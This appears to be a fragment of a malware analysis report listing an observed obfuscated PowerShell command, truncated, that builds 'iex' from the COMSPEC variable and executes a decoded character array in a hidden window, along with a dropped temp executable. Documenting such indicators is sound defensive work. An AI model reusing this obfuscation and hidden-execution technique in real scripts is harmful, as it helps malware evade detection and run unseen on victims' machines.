Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:COMspeC[4,15,25]-jOIN'')(-JOin ( [cHAr[]] ( 32 , 74,92 , 110 , 73 , 69 ,36 , 57,36 , 106,97 , 115 ,41,107,102,110,97 ,103 , 112, 36 , 118,101, 106 ,96 ,107,105,63 ,32, 109 ,110, 66,77 ...
- %TEMP%\255991.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:COMspeC[4,15,25]-jOIN'')(-JOin ( [cHAr[]] ( 32 , 74,92 , 110 , 73 , 69 ,36 , 57,36 , 106,97 , 115 ,41,107,102,110,97 ,103 , 112, 36 , 118,101, 106 ,96 ,107,105,63 ,32, 109 ,110, 66,77 ...' (with a hidden window)